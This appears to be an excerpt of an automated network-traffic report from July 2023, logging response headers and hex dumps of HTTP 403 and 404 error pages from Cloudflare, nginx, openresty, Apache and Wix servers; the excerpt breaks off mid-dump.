                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:04 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XEu7WMBLo2vkeNfdc6ifBcYn7N8xEDKh%2Fln%2FXXryNYlmxyzg%2BbRrO7JS0JZ6AKEWYs0BZkiwMp8N1Pr%2F5VHeva5i%2Ffs%2ByweZsnINx%2B93OPNbvxWkVeIBM6F%2F6JBU%2BzU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75ffcd81336dd-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:14 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GTQw3xskTYYSJLTkBVcVnIrMK7Jul2OUNoUmSmM3hgu3s1rICP7wR0%2BmFIsFNMnVXxT7o7tut3Fn%2B5nd8LPz8N4t8KTPm3zLdBbXEOOJHpXG1AqQKUwQVpXzn2y4SRuI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76039f82d3677-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:14 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ykybx3rhT1p86fdSLtidLkpJxxPwN6k0bu%2F06ZLY2F5Emgn56e0Q7cjlePMdx8GF4qQhkydqg5TIabqT0pLUBv9InJNjLCMJzxsafolu7xVXW8xSqOtSzL8fY%2Bbab8fR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed7603a28853677-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:44:17 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:20 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FEwBkKX6PdE5lsZ7s7rDRRlbIFrw6Ka%2FX5WcFd4vTt507cXRT45FXWonRDv%2FBlEHkt8vEGtnFCtlXtcEYFmYnDcqK4r%2B9hj%2BIUQsJbXfzNRsW9lqoIvnDiPOnBS6tCk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76062afd939d3-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:20 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dv%2FR5DFMXOu0K9huxjW7uyBUPlIYNQ8jMvxoVpfHYKer3sW513uw687RHDAXOIr%2FGjL15OKnqubQbOhmZAe0jyj6PexTB0kVq4x36tDvMZGOkTCLsoaBEqi%2BJJAM360%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76062d82f39d3-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:44:35 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jc1wbUM8qOdzrlYIn%2BP4rNuoOOUp79QHY3fdnGUxgLVTaWuLMZZb1IxRUG04%2BZONZhaRn7uH56m8wMTBidRDM7hPMbrBL7CnQs6fYh5YqQhuFhieVgG6qA0RN6oBDoXc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed760633af60487-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! |
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487061.02341348064113353X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:44:21 GMTX-Served-By: cache-mxp6934-MXPX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4LpB1e4fStpawOReABU4/eI,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:44:21 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:44:21 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:22 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:22 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:23 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMcfX4HJto+QUpjFQhXwjCys,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1690487063.72718502187816047X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 